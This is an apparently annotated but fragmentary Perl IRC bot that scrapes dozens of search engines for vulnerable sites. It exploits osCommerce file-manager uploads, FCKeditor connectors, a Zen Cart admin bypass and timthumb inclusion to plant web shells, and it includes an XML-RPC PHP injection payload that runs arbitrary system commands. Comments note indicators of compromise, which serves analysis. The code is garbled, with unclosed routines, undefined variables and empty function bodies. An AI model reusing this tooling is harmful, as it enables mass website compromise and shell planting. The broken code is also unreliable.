(#4@#15FreeSpace= $free#9)");sleep(2);
# osco2 / osco_xpl2: same flow as above for the file_manager.php variant;
# the gate here is the "TABLE_HEADING_FILENAME" string in the page and the
# upload is posted to "?action=processuploads".
sub osco2() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site.$bug;
my $html = &get_content($test);
if ($html =~ /TABLE_HEADING_FILENAME/ ) {
# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);
&osco_xpl2($test,$chan,$site,$engine);
} else { }
} exit; sleep(2); }
sub osco_xpl2() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=processuploads";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);
my $safe ="";
my $os ="";
my $free ="";
&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);
&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);
# loko / op / zen / thumb: four exposure checks that share one shape --
# pull the host list from search_engine(), GET a fixed path on each host and
# compare the body against a pattern. Each sub on this page stops mid-body
# (no foreach, no closing braces); $loko_output and $open_output are never
# defined in this view.
# loko: probes "filemanager/browser.html" (FCKeditor file browser).
sub loko() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site."filemanager/browser.html";
my $vuln = "http://".$site."filemanager/browser.html";
my $re = &get_content($test);
if ($re =~ /$loko_output/){
# op: probes the OpenCart FCKeditor connector path held in $open_test.
sub op() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
if ($count == $num-1) { &msg("$chan","$oplogo(#4@#8$engine#15)#10 Scan
finish"); }
my $test = "http://".$site.$open_test;
my $vuln = "http://".
$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
my $re = &get_content($test);
if ($re =~ /$open_output/){
# zen: targets the Zen Cart admin/record_company.php path and then looks
# for images/brons.php on the host -- that filename is the indicator.
sub zen() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".
$site."admin/record_company.php/password_forgotten.php?action=insert";
my $vuln = "http://".$site."images/#4brons.php";
my $re = &get_content($vuln);
else{
}
######################################### ADDED
# thumb: requests timthumb.php?src=<$thumbshell> and then checks the two
# fixed cache paths below. The hash in the filename is constant in this
# sample, so requests for cache/ or temp/<that-hash>.php are a precise
# host-side indicator.
sub thumb() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";
my $cek = &get_content($coba);sleep(1);
my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";
my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";
# Note the stray "." before "$aa"/"$ab": the built URL contains
# "<bug>.cache/..." as written.
my $ceck1 = "http://".$site.$bug.".$aa";
my $ceck2 = "http://".$site.$bug.".$ab";
my $loco1 = &get_content($ceck1);sleep(1);
my $loco2 = &get_content($ceck2);sleep(1);
my $vuln = "http://".$site.
$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";
#########################################
# search_engine(chan, bug, dork, engine, logo): collects candidate hosts for
# a dork from the per-engine scrapers below and de-duplicates them through
# clean() (not in this view). Only the prologue and the final clean() call
# survive; the engine dispatch and the return are missing.
sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
@clean = &clean(@total);
#########################################
# isFound(link, regexp): fetches $link and is meant to set $status when the
# body matches $reqexp. The match is missing here, so as shown it always
# returns 0 -- which, per parse(), blocks every scanner command.
sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
return $status;
# get_content(url): GET helper with a 7s timeout. $ua and $req are never
# created on this page, so $url is unused as shown.
sub get_content() {
my $url = $_[0];
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;
sub google() {
my @list;
my $key = $_[0];
my $search = ("http://www.google.com/search?
q=".&key($key)."&num=100&filter=0&start=".$i);
my $res = &search_engine_query($search);
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
return @list;
sub rediff() {
my @list;
my $key = $_[0];
my $search = ("http://search1.rediff.com/dirsrch/default.asp?
MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
$b = "$i";
my $res = &search_engine_query($search);
if ($1 !~ /rediff\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub uol() {
my @list;
my $key = $_[0];
my $search = ("http://mundo.busca.uol.com.br/buscar.html?
q=".&key($key)."&start=".$i);
my $res = &search_engine_query($search);
if ($1 !~ /uol\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub bing() {
my @list;
my $key = $_[0];
my $search = ("http://www.bing.com/search?
q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = &search_engine_query($search);
if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}
if ($1 !~ /bing\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub altavista() {
my @list;
my $key = $_[0];
my $search = ("http://it.altavista.com/web/results?
itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);
my $res = &search_engine_query($search);
if ($1 !~ /altavista/){
my $link = $1;
$link =~ s/<//g;
$link =~ s/ //g;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub ask() {
my @list;
my $key = $_[0];
my $search = ("http://it.ask.com/web?
q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".
$i."&jss=1&dm=all");
my $res = &search_engine_query($search);
if ($1 !~ /ask\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub yahoo(){
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /yahoo\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub clusty() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-
form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
my $res = &search_engine_query($search);
if ($1 !~ /yippy\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub gutser() {
my @list;
my $key = $_[0];
my $search = ("http://www.goodsearch.com/Search.aspx?
Keywords=".&key($key)."&page=".$b."&osmax=0");
my $res = &search_engine_query($search);
if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub google2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms =
("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd
","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","
co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","c
om.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn",
"hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","
co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms
","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np
","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr"
,"pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","
sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug
","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","c
o.zm");
my $search = ("http://www.google.".$dom."/search?
num=50&q=".&key($key)."&start=".$b."&sa=N");
my $res = &search_engine_query($search);
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
} return @list;
}
sub exalead() {
my @list;
my $key = $_[0];
my $search = ("http://www.exalead.com/search/web/results/?
q=".&key($key)."&elements_per_page=100&start_index=".$b);
my $res = &search_engine_query($search);
my $link = $1;
if ($link!~ /exalead/){
my @grep = &links($link);
push(@list,@grep);
return @list;
sub lycos() {
my @list;
my $key = $_[0];
my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".
$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
my $res = &search_engine_query($search);
if ($1 !~ /lycos\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub virgilio() {
my @list;
my $key = $_[0];
my $res = &search_engine_query($search);
if ($1 !~ /\.virgilio\.it/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub webde() {
my @list;
my $key = $_[0];
my $res = &search_engine_query($search);
my $link = $1;
if ($link!~ /suche|web/){
my @grep = &links($link);
push(@list,@grep);
return @list;
sub hotbot() {
my @list;
my $key = $_[0];
my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
my $res = &search_engine_query($search);
if ($1 !~ /hotbot\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub aol() {
my @list;
my $key = $_[0];
my $search = ("http://aim.search.aol.com/aol/search?
q=".&key($key)."&page=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
if ($1 !~ /aol\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub sapo(){
my @list;
my $key = $_[0];
my $search = ("http://pesquisa.sapo.pt/?
barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".
$b."&q=".&key($key)."&st=local");
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub duck() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://duckduckgo.com/html/?
q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub lygo() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub yause() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.yauba.com/?
query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&p
g=".$b);
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub baidu() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /baidu\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub kipot() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
my $res = &search_engine_query($search);
if ($1 !~ /qkport\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
my @list;
my $key = $_[0];
my $hal = "/search?q=".&key($key);
my $search = ("http://www.gigablast.com".$hal);
my $res = &search_engine_query($search);
$search = ("http://www.gigablast.com".$hal);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
$res = &search_engine_query($search);
}return @list;
sub black() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
my $cek = $b+1;
my $res = &search_engine_query($search);
if ($1 !~ /blekko/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
return @list;
sub onet() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
my $res = &search_engine_query($search);
if ($1 !~ /webcache|query/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
return @list;
sub sizuka() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.szukacz.pl/szukaj.aspx?
ct=polska&pc=polska&q=".&key($key)."&start=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /szukacz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub walla() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".
$b);
my $res = &search_engine_query($search);
if ($1 !~ /walla\.co\.il/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub demos() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.dmoz.org/search/search?
q=".&key($key)."&start=".$b."&type=next&all=yes");
my $res = &search_engine_query($search);
if ($1 !~ /search|dmoz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
# Query the euroseek.com search backend for the dork in $_[0] and return the
# (link, host, dir) triples that &links() derives from a result URL.
# NOTE(review): as extracted, this sub is internally inconsistent — @langs is
# declared but $lang is never assigned, $b never advances, and $1 is read
# although no match that would set it is visible here; the per-language and
# per-page loops that would supply them appear to be missing from this listing.
sub rose() {
my @list;
my $key = $_[0];    # raw dork; &key() URL-encodes it for the query string
my $b = 0;          # result offset passed as start=
my @langs =
("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
my $search = ("http://euroseek.com/system/search.cgi?language=".
$lang."&mode=internet&start=".$b."&string=".&key($key));
my $res = &search_engine_query($search);
# Results that point back at euroseek itself are skipped; $1 is expected to
# hold a captured result URL, but $res is never matched against here.
if ($1 !~ /euroseek/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}return @list;
}
sub seznam() {
my @list;
my $key = $_[0];
my $search = ("http://search.seznam.cz/?
q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /seznam/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub tiscali() {
my @list;
my $key = $_[0];
my $search = ("http://search.tiscali.it/?
tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
my $res = &search_engine_query($search);
if ($1 !~ /tiscali/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub naver() {
my @list;
my $key = $_[0];
my $res = &search_engine_query($search);
if ($1 !~ /naver/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
#########################################
sub clean() {
my @cln = ();
my %visit = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visit{$element}++;
return @cln;
# URL-encode a dork string for use in a search-engine query URL. Only the
# characters listed in %enc are rewritten (space becomes '+'); everything
# else, including any '%' or '+' already present in the input, passes
# through untouched. Keeps the () prototype of the original; callers invoke
# it as &key(...), which bypasses the prototype.
sub key() {
my $dork = $_[0];
my %enc = (
    ' '  => '+',
    ':'  => '%3A',
    '/'  => '%2F',
    '?'  => '%3F',
    '&'  => '%26',
    '"'  => '%22',
    ','  => '%2C',
    '\\' => '%5C',
    '@'  => '%40',
    '['  => '%5B',
    ']'  => '%5D',
    '='  => '%3D',
    '|'  => '%7C',
);
# A single pass is equivalent to the original chain of s///g calls: no
# replacement text contains a character that a later substitution rewrites.
$dork =~ s{([ :/?&",\\\@\[\]=|])}{$enc{$1}}g;
return $dork;
}
# Derive three candidate base paths from one result URL and return them as
# (link, host, dir), each with a trailing '/' and any '//' collapsed in a
# single left-to-right pass (so '///' becomes '//').
# The host regex assumes a scheme-less input ('host/path'); when 'http://'
# is present, the '//' collapse also rewrites the scheme separator.
# Keeps the () prototype; callers use &links(...), which bypasses it.
sub links() {
my $url = $_[0];
my ($link, $host, $hdir) = ($url, $url, $url);
$hdir =~ s{(.*)/[^/]*$}{$1};            # drop the last path component
$host =~ s{([-a-zA-Z0-9.]+)/.*}{$1};    # keep only the host part
my @out = map {
    my $p = $_ . '/';
    $p =~ s{//}{/}g;
    $p;
} ($link, $host, $hdir);
return @out;
}
sub search_engine_query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
eval {
my @pages = <$sock>;
$page = "@pages";
close($sock);
};
return $page;
#########################################
sub shell() {
my $path = $_[0];
my $cmd = $_[1];
return;
my $c = 0;
chop $output;
&msg("$path","$output");
if ($c == 5) { $c = 0; sleep 2; }
exit;
}}
sub isAdmin() {
my $status = 0;
my $nick = $_[0];
return $status;
# IRC message sender: called throughout as &msg($target, $text) (see shell(),
# cmdlfi() and cmdxml() below), but its body is empty in this listing —
# presumably it wrapped sendraw("PRIVMSG ...") and was lost in extraction;
# confirm against the original file before relying on this copy.
sub msg() {
}
sub nick() {
sendraw("NICK $_[0]");
sub notice() {
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $chan = $_[2];
$browser->agent("$hie");
$browser->timeout(7);
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
&msg("$chan","#15,1(#4@9CMDLFI#15)#9 $1#");
} else {
&msg("$chan","#15,1(#4@9CMDLFI#15)#4 No Output#");
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $chan = $_[2];
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'bamby';system('".
$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","#15,1(#4@9CMDXML#15)#9 $1#");
} else {
&msg("$chan","#15,1(#4@9CMDXML#15)#4 No Output#");